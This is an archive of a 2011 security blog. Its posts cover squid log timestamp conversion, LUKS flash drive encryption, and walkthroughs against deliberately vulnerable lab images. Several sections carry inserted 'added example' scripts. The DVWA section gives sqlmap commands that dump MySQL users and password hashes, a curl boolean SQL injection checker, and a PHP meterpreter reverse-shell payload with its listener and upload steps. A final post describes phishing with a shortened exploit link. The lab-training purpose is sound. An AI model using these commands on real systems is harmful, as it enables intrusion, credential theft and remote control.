Wednesday 2 November 2011

Linux Time (costing me time!)

Recently I had to *quickly* analyse some squid logs on a compromised box; fortunately for me the attacker didn't do any post-exploitation log clearance, so there was plenty for me to look at. :-)
Anyway, this particular squid setup was writing its logs with the Unix timestamp. For those of you who don't know about Unix/Linux timestamps, they are the number of seconds since 00:00:00 UTC on 1 January 1970, referred to as the Epoch; squid's native log format adds the milliseconds after the decimal point.
I'm not one for using GUIs for such a simple task, so I used a bit of awk; it's very simple.
Here's an extract from some other squid logs, which shows the timestamp in column 1:
 [root@gateway ~]# tail -f /var/log/squid/access.log
1320259150.490      1 10.50.60.193 TCP_MEM_HIT/200 811 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGPvRCiCE0goqBf-oAgA_MgX7qAIADw - NONE/- application/vnd.google.safebrowsing-chunk
1320259167.644    407 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.149.230 text/javascript
1320259173.477     84 10.44.254.213 TCP_MISS/200 543 GET http://go.sky.com/vod/viewless/currentTime.do - DIRECT/2.17.237.52 text/plain
1320259231.937    472 10.44.254.170 TCP_MISS/200 759 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
1320259232.013    356 10.44.254.170 TCP_MISS/200 744 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
1320259289.600    388 10.44.254.109 TCP_MISS/200 1936 GET http://api.twitter.com/1/trends/23424975.json? - DIRECT/199.59.148.20 application/json
1320259322.271    396 10.44.254.170 TCP_MISS/200 2021 GET http://www.google.com/reader/api/0/unread-count? - DIRECT/74.125.230.145 text/javascript
1320259347.605    393 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.148.82 text/javascript
1320259369.710    191 10.44.254.170 TCP_MISS/200 728 GET http://query.yahooapis.com/v1/public/yql? - DIRECT/87.248.113.166 application/json
1320259370.535   1016 10.44.254.170 TCP_MISS/200 1349 GET http://weather.yahooapis.com/forecastjson? - DIRECT/87.248.122.181 application/json
Now with a bit of awk we can add a human-readable timestamp next to the epoch timestamp. One caveat first: strftime() only converts the log's own time when it is handed the epoch from column 1 as its second argument. Called with the format string alone, as it is in the command below, it formats the current wall-clock time, which is why every line of the output below carries the same 18:45:36 stamp even though the epoch values span about a hundred seconds:
 [root@gateway ~]# tail -f /var/log/squid/access.log | awk '{ print strftime("%y-%m-%d %H:%M:%S"), $0; }'
11-11-02 18:45:36 1320259435.980    916 10.44.254.186 TCP_MISS/200 32393 GET http://twitter.com/statuses/user_timeline/d3m0n35.json - DIRECT/199.59.149.198 application/json
11-11-02 18:45:36 1320259453.347    116 10.44.254.213 TCP_MISS/200 710 POST http://safebrowsing.clients.google.com/safebrowsing/downloads? - DIRECT/209.85.143.101 application/vnd.google.safebrowsing-update
11-11-02 18:45:36 1320259453.438     53 10.44.254.213 TCP_MEM_HIT/200 527 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGP6QBSD-kAUyBX5IAQAB - NONE/- application/vnd.google.safebrowsing-chunk
11-11-02 18:45:36 1320259453.503     55 10.44.254.213 TCP_MISS/200 951 GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGPvRCiCE0goqBQGpAgAPMgX7qAIAPw - DIRECT/209.85.147.139 application/vnd.google.safebrowsing-chunk
11-11-02 18:45:36 1320259521.453     80 10.44.254.213 TCP_REFRESH_HIT/304 550 GET http://images.apple.com/main/rss/hotnews/hotnews.rss - DIRECT/77.109.169.163 application/xml
11-11-02 18:45:36 1320259521.489    116 10.44.254.213 TCP_MISS/200 51415 GET http://news.google.com/? - DIRECT/74.125.230.128 application/xml
11-11-02 18:45:36 1320259522.144    891 10.44.254.213 TCP_MISS/304 549 GET http://techie-buzz.com/how-to/uninstall-programs-on-mac.html/feed - DIRECT/72.14.188.242 -
11-11-02 18:45:36 1320259527.646    421 10.44.254.109 TCP_MISS/200 4854 GET http://twitter.com/account/available_features - DIRECT/199.59.148.10 text/javascript
11-11-02 18:45:36 1320259532.430    404 10.44.254.170 TCP_MISS/200 743 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
11-11-02 18:45:36 1320259532.531    555 10.44.254.170 TCP_MISS/200 2095 GET http://search.twitter.com/search.json? - DIRECT/199.59.148.201 application/json
So what's this awk syntax doing? Here is the corrected form, with the timestamp passed in:
  awk '{ print strftime("%y-%m-%d %H:%M:%S", $1), $0; }' 
The log lines are piped to awk, which runs the action once per input line. strftime() is a GNU awk (gawk) extension, also available in busybox awk and recent mawk, that formats a Unix timestamp according to a format string, in this case:
 %y for the two-digit year-%m for month-%d for day, then %H for hour:%M for minute:%S for second 
The second argument, $1, is the first whitespace-separated field of the line, i.e. the epoch timestamp. Leave it out and strftime() formats the current time instead, so every line gets the same stamp. It also converts to the local time zone of the box you run it on, so set TZ=UTC0 (or whatever zone your other evidence is in) before running it when correlating with logs from other hosts.
The last piece of the syntax, $0, is the whole current input record, so each converted timestamp is printed followed by the original log line.
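Putting the conversion into a script, as an added example that is not part of the original post: the epoch in column 1 is converted with strftime() pinned to UTC, and two further awk one-liners do the filtering and counting that usually follow on a compromised box. The log lines are constructed in the same format as the extract above, with illustrative hosts and IPs; the awk in use must have strftime() (gawk, busybox awk or mawk 1.3.4 and later).

```sh
#!/bin/sh
# Added example (not from the original post): convert the epoch in column 1 of
# squid's native access.log to a readable stamp, pinned to UTC so the result
# doesn't depend on the analysis box's time zone, then the two awk one-liners
# that usually come next on a compromised box.  Needs an awk with strftime()
# (gawk, busybox awk, mawk 1.3.4+).  The log lines are constructed in the same
# format as the post's extract; hosts and IPs are illustrative.

SAMPLE_LOG='1320259150.490      1 10.50.60.193 TCP_MEM_HIT/200 811 GET http://example.test/chunk - NONE/- application/octet-stream
1320259167.644    407 10.44.254.109 TCP_MISS/200 4854 GET http://example.test/features - DIRECT/198.51.100.7 text/javascript
1320259370.535   1016 10.44.254.170 TCP_MISS/200 1349 GET http://example.test/forecast - DIRECT/198.51.100.9 application/json
1320259371.002    402 10.44.254.170 TCP_MISS/200 743 GET http://example.test/search - DIRECT/198.51.100.9 application/json'

# stamp_squid: prefix each line with the UTC time taken from $1, the log's own
# timestamp, keeping the millisecond part as text.  The classic mistake is
# strftime(fmt) with no timestamp argument, which stamps every line with the
# moment awk ran instead of the moment the request was logged.
stamp_squid() {
    TZ=UTC0 awk '{
        ms = index($1, ".") ? substr($1, index($1, ".") + 1) : "000"
        print strftime("%Y-%m-%dT%H:%M:%S", int($1)) "." ms "Z", $0
    }'
}

# squid_between FROM TO: keep lines whose epoch lies in [FROM, TO]; filtering
# on the raw number is cheaper than converting every line first.
squid_between() {
    awk -v from="$1" -v to="$2" '$1 >= from && $1 <= to'
}

# clients_by_requests: request count per client IP (column 3), busiest first.
clients_by_requests() {
    awk '{ n[$3]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

printf '%s\n' "$SAMPLE_LOG" | stamp_squid
printf '%s\n' "$SAMPLE_LOG" | squid_between 1320259160 1320259200
printf '%s\n' "$SAMPLE_LOG" | clients_by_requests
```

Run it against a real log with `stamp_squid < /var/log/squid/access.log` (or behind `tail -f`); the window for `squid_between` is easiest to get by converting a known date with `date -u -d '2011-11-02 18:40:00' +%s` on GNU systems.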

Thursday 20 October 2011

Linux Encrypted Flash Drive - LUKS

So you pull your bunch of keys out of your pocket and feel for your flash disk, and you don't feel it. You look frantically over your keyring and it's gone. Were the contents or the partition encrypted?
Encrypt your Key in Linux
This has been tested on Ubuntu 11.10, and for the purposes of the demonstration the partition is /dev/sdb1. Please make sure this is the correct partition for your flash key (check dmesg or lsblk right after plugging it in); DaF will NOT be held responsible for lost data!
We're using cryptsetup's luksFormat, whose default at the time of writing is AES with a 256-bit key (verify what you actually got afterwards with cryptsetup luksDump /dev/sdb1). The cipher is only as strong as the passphrase, so use one that's at least 12 characters long, contains no dictionary words, and mixes letters, numbers and symbols.
First of all, make a backup of the contents of your key.
Then open your favorite terminal emulator and do the following:
 mac@pentest:~$ sudo umount /dev/sdb1
 mac@pentest:~$ sudo cryptsetup luksFormat /dev/sdb1
This will present you with the following:
WARNING!
========
This will overwrite data on /dev/sdb1 irrevocably.

Are you sure? (Type uppercase yes):
You should then answer (in UPPERCASE):
 YES
You'll be prompted for a pass phrase:
 Enter LUKS passphrase:
Verify your pass phrase
 Verify passphrase:
Next, open the LUKS container; this maps the decrypted view of the partition to /dev/mapper/EncryptedFlashDisk, which is what we'll format:
 mac@pentest:~$ sudo cryptsetup luksOpen /dev/sdb1 EncryptedFlashDisk
Now we need to format that mapped device. EncryptedFlashDisk here is the device-mapper name chosen in the previous step, not a filesystem label; if you also want a label, pass -n to mkfs.vfat (FAT labels are limited to 11 characters):
 mac@pentest:~$ sudo mkfs.vfat /dev/mapper/EncryptedFlashDisk
The output will look similar to this; the geometry warning is harmless:
mkfs.vfat 3.0.9 (31 Jan 2010)
unable to get drive geometry, using default 255/63
That's it. Unmount and close the container (cryptsetup luksClose EncryptedFlashDisk) before pulling the stick, so the key is dropped from memory; the next time you plug in the drive you'll be prompted for the passphrase:
Encrypted Flash Disk Password Prompt
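The same steps as a script, added here as an example and not part of the original post: it refuses to touch anything but a partition on a removable disk, names the cipher and key size explicitly instead of relying on the cryptsetup default, checks the resulting header with luksDump, and closes the container at the end. The device path, mapper name and filesystem label are illustrative assumptions.

```sh
#!/bin/sh
# Added example, not from the original post: the luksFormat / luksOpen / mkfs
# steps wrapped in a script that (1) refuses to touch anything except a
# partition on a removable disk, (2) names the cipher and key size instead of
# trusting the cryptsetup default, (3) verifies the header afterwards and
# (4) closes the container so the key is cleared before the stick is pulled.
# Device path, mapping name and filesystem label are illustrative assumptions.

# is_removable_part DEV: 0 if DEV is a block device whose parent disk the kernel
# flags as removable (/sys/block/<disk>/removable == 1).  Assumes sdX-style
# names, e.g. /dev/sdb1 -> sdb, which is what USB sticks get.
is_removable_part() {
    dev=$1
    [ -b "$dev" ] || return 1
    disk=$(basename "$dev" | sed 's/[0-9]*$//')
    [ "$(cat "/sys/block/$disk/removable" 2>/dev/null)" = 1 ]
}

# header_summary: reduce `cryptsetup luksDump` output (LUKS1 layout) on stdin
# to "cipher-mode keybits", so you can confirm what you really got.  LUKS2
# prints its header differently and would need its own parser.
header_summary() {
    awk '/^Cipher name:/ { c = $3 } /^Cipher mode:/ { m = $3 } /^MK bits:/ { b = $3 }
         END { print c "-" m " " b }'
}

# encrypt_stick DEV NAME LABEL: the whole procedure.  NAME is only the
# /dev/mapper entry; LABEL is the FAT label, 11 characters at most.
encrypt_stick() {
    dev=$1; name=$2; label=$3
    is_removable_part "$dev" || { echo "refusing: $dev is not a partition on a removable disk" >&2; return 1; }
    sudo umount "$dev" 2>/dev/null || true
    # aes-xts-plain64 with a 512-bit key is AES-256 in XTS mode; the default
    # in cryptsetup of the post's era was 256-bit aes-cbc-essiv:sha256.
    sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 "$dev"
    sudo cryptsetup luksOpen "$dev" "$name"
    sudo mkfs.vfat -n "$label" "/dev/mapper/$name"
    sudo cryptsetup luksDump "$dev" | header_summary
    sudo cryptsetup luksClose "$name"
}

# Usage (destroys everything on the partition, as in the post):
# encrypt_stick /dev/sdb1 EncryptedFlashDisk ENCFLASH
```

The removable check is the part worth keeping even if you type the rest by hand: luksFormat on the wrong /dev/sdX is unrecoverable, and the kernel already knows which disks are USB sticks.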

Thursday 1 September 2011

Importing Nessus results into Metasploit

Welcome to my small tutorial regarding the usefulness of importing Nessus scan results into Metasploit.

Metasploit now has support for MySQL, PostgreSQL and SQLite; I'll be using SQLite.





Tools:
Metasploitable
Back|Track4
Nessus
Exploit-db


Thursday 11 August 2011

Kioptrix Level 1.1 - Nmap, Metasploit and SQLInject Me

Good evening and welcome to my demonstration of Kioptrix Level 1.1 (also numbered Level 2).
Kioptrix is another deliberately vulnerable distro for practising exploitation legally.
I'll kick off the video with a /24 scan of my lab LAN, 10.50.60.0, followed by some SQL injection, some local file inclusion, PHP exploitation, privilege escalation and finally a proof of concept.
I have to say I found this vulnerable distro a lot more challenging than previous ones, and I want to say a big thanks to Kioptrix.com; so thank you.


Wednesday 1 June 2011

DVWA

Brute Force

Brute forcing is the trial-and-error process of guessing an application's or service's username and/or password. There are many tools around to automate this for different applications or services.
The DVWA Brute Force section has an HTML login form where you can practise username/password brute-force attacks.
I'm going to demonstrate this with FireForce, a Mozilla Firefox plugin that brute-forces GET or POST forms.
Here's a small demo of it in action:


SQL Injection

SQL injection is a technique for feeding the database code of your own through an application's front end; the vulnerability arises when the programmer builds a query by concatenating user input into the SQL string without parameterising it or escaping the characters (quotes, comment markers) that change the structure of the query.
There are many ways to defeat the SQL Injection section of DVWA. I used SQLMap and the Tamper Data Firefox plugin.
Fire up DVWA, log in with admin / password and set the security level to low.
Open the SQL Injection section and enter 1 in the User ID field to see the normal output:
ID: 1
First name: admin
Surname: admin
Now enter 1' instead: at the low security level the page comes back with a MySQL syntax error, which shows that the quote reached the query unescaped, i.e. the form is vulnerable to SQL injection.
Now open the Tamper Data plugin and click Start Tamper; click the SQL Injection link in the DVWA menu again to reset the form, then enter 1 and click Submit once more. In Tamper Data, copy the cookie, including PHPSESSID and the security level, and paste it into Kate or some other editor; also make a note of the URL while you have it open. You'll see why in a second.
Next open a terminal, cd to your SQLMap directory and start building your command line; here's what I used:
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --dbs
I'll break this down for you:
-u: the URL of the form page
--cookie: the cookie you copied from Tamper Data, including the security level, so sqlmap is tested as your logged-in session
--string: a string that appears in the page only when the injected condition is true; sqlmap uses it to tell true responses from false ones
--dbs: enumerate the DBMS's databases
This should give you output similar to this:
    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:38:12

[10:38:13] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:38:13] [INFO] resuming string match 'Surname' from session file
[10:38:13] [INFO] resuming injection point 'GET' from session file
[10:38:13] [INFO] resuming injection parameter 'id' from session file
[10:38:13] [INFO] resuming injection type 'stringsingle' from session file
[10:38:13] [INFO] resuming 0 number of parenthesis from session file
[10:38:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:38:13] [INFO] testing connection to the target url
[10:38:13] [INFO] testing for parenthesis on injectable parameter
[10:38:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:38:13] [INFO] fetching database names
[10:38:13] [INFO] fetching number of databases
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 3
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': information_schema
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': dvwa
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[10:38:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:38:13
Brilliant! Here you can clearly see you have enumerated the database names: dvwa, information_schema and mysql. Now let's see if we can get some usernames and passwords.
Here's the syntax I used:
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --users --passwords
The only differences here are:
 --users, which enumerates the DBMS users, and --passwords, which dumps their password hashes
You should get output similar to this:
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:39:09

[10:39:10] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:39:10] [INFO] resuming string match 'Surname' from session file
[10:39:10] [INFO] resuming injection point 'GET' from session file
[10:39:10] [INFO] resuming injection parameter 'id' from session file
[10:39:10] [INFO] resuming injection type 'stringsingle' from session file
[10:39:10] [INFO] resuming 0 number of parenthesis from session file
[10:39:10] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:39:10] [INFO] testing connection to the target url
[10:39:10] [INFO] testing for parenthesis on injectable parameter
[10:39:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:39:10] [INFO] fetching database users
[10:39:10] [INFO] fetching number of database users
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 4
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'localhost'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'dojo-vm'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'127.0.0.1'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:39:10] [INFO] fetching database users password hashes
[10:39:10] [INFO] fetching number of password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[10:39:10] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[10:39:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:39:10
Excellent! Now you have the password hashes for root and debian-sys-maint. The leading * marks them as MySQL 4.1+ hashes, i.e. SHA1(SHA1(password)) with no salt, so they are not decrypted but cracked: feed them to John the Ripper (--format=mysql-sha1) or hashcat (mode 300) with a decent wordlist and they fall quickly.
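What the --string option is actually checking, done by hand with curl as an added example (this is not from the post and not sqlmap's own code): the id value is closed off with a quote and an always-true or always-false condition appended; when the marker string appears only for the true case, the parameter is injectable. The host, cookie values and response text follow the lab above and are assumptions here, and the fetcher is passed in as a command so the check can be exercised offline.

```sh
#!/bin/sh
# Added example, not from the post and not sqlmap's own code: the boolean test
# behind sqlmap's --string="Surname" option, done by hand with curl.  The id
# parameter is closed with a quote and an always-true or always-false
# condition is appended; when the marker appears only for the true case, the
# value is reaching the query unescaped.  Host and cookie values are the
# post's lab values and are assumptions here.

DVWA_URL='http://10.50.60.116/dvwa/vulnerabilities/sqli/'
DVWA_COOKIE='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low'

# fetch_dvwa ID: GET the page with id=ID (URL-encoded by curl) and print the body.
fetch_dvwa() {
    curl -s -G --cookie "$DVWA_COOKIE" \
        --data-urlencode "id=$1" --data-urlencode 'Submit=Submit' "$DVWA_URL"
}

# boolean_sqli_check FETCH MARKER [ID]: FETCH is any command that takes an id
# value and prints the response body (fetch_dvwa, or a stub when testing
# offline).  Returns 0 when MARKER is present for
#   ID' AND '1'='1    and absent for    ID' AND '1'='2
# which is the signal for boolean-based injection; a marker that shows up in
# both responses (or in neither) proves nothing.
boolean_sqli_check() {
    fetch=$1; marker=$2; id=${3:-1}
    true_body=$("$fetch" "$id' AND '1'='1")
    false_body=$("$fetch" "$id' AND '1'='2")
    case $true_body in *"$marker"*) ;; *) return 1 ;; esac
    case $false_body in *"$marker"*) return 1 ;; esac
    return 0
}

# With DVWA at security=low the query is
#   SELECT first_name, last_name FROM users WHERE user_id = '<id>'
# so the first payload becomes ... user_id = '1' AND '1'='1' (one row back)
# and the second returns no row, and "Surname" appears only in the first body.
# boolean_sqli_check fetch_dvwa Surname 1 && echo "id is injectable"
```

The same pair of requests is what sqlmap sends many times over when it later extracts data bit by bit, with the always-true condition replaced by a comparison against the value it is guessing; the marker string is what turns each response into one bit.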
Here's a short video showing how I did it:



CSRF

First of all I'd like to describe cross-site request forgery. This is not a new thing; the technique has been around for many years and is also known as session riding in the black hat world. A CSRF attack makes the victim's browser send a request that the application accepts as coming from a "trusted", logged-in user. Unlike what I like to call its cousin, XSS (cross-site scripting), it exploits the trust that a site has in a user's browser rather than the trust a user has in a particular site.
Tonight I will be attacking the CSRF section of DVWA.
I'll be using Firefox, FireBug, FoxyProxy, OWASP's CSRFTester and good ol' Kate, all available in the awesome Back|Track4.
I'll capture a genuine HTTP request to change the password using CSRFTester and FoxyProxy, then edit the HTTP request from GET to POST with Kate to show the proof of concept; I'll then open this edited HTTP request in Firefox and forge a password change request against the web application.
During the password change, I'll edit the page with FireBug to show the password change.



Upload Exploitation
In this video I'll create a PHP payload with msfpayload (since replaced by msfvenom in current Metasploit releases):
msfpayload php/meterpreter/reverse_tcp LHOST=10.50.60.161 LPORT=8080 R > connectback.php
I'll also edit the connectback.php script to remove the "safety latch", the # on line 1, so the PHP is live when the server runs it.
Then setup Metasploit to handle the reverse connection:
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.50.60.161
set LPORT 8080
exploit
I'll then use the Upload section of DVWA to upload the payload, check the page source for where it went, browse to the upload directory http://10.50.60.193/dvwa/hackable/uploads and request connectback.php so the web server executes it. This works because at the low security level the upload form checks nothing about the file, and the uploads directory is served by Apache with PHP execution enabled.
This gives me a session on DVWA as the www-data user (Apache).



Monday 14 February 2011

pwnOS with Metasploit, Nmap, Nessus and Exploit-DB.com

pwnOS is a training Ubuntu server image for exploit practice, much like Metasploitable or De-ICE.
There are a couple of vulnerable services that I have discovered so far: one is an out-of-date Webmin install, another is the same Debian weak SSL ciphers used on Metasploitable (slightly annoying :-/ ), and there's a vulnerable Linux kernel.
In the following tutorial I show you how to go from "boot to root" in around 10-20 minutes.
Firstly we'll kick off the show with some information gathering; the image is installed on a box on my 10.50.60.0 network, so we'll start with a full /24 scan, followed by a Nessus vulnerability scan of the image.
Then we look at exploitation, then some privilege escalation and finally the proof of concept.
I found this a lot easier than Metasploitable and was able to get root access in around 2 hours, which did annoy me slightly, but still, hats off to bond00 at http://heorot.net; it's a good training exercise.
http://www.youtube.com/watch?v=YL-Jus8S26c

Sunday 23 January 2011

Social engineering with Metasploit and URL shortening

Good evening and welcome to my small demonstration.
Tonight I will exploit a vulnerable Windows 7 machine with a 0day.
This exploit will involve social engineering between two users, the attacker demouser1 and the victim demouser2, to which I have an RDP session.
I will kick off the exploit using the Metasploit browser_autopwn module and control the payload and listener from Metasploit; then I'll do some social engineering to get the Win 7 user to click a link, which I will have shortened using the Bit.ly URL shortening service and emailed to the user with Mozilla Thunderbird.
The payload will be a Java reverse shell and the vulnerability is ms11_xxx_ie_css_import, delivered in a .NET DLL.
All of the utilities and features are included in Back|Track4.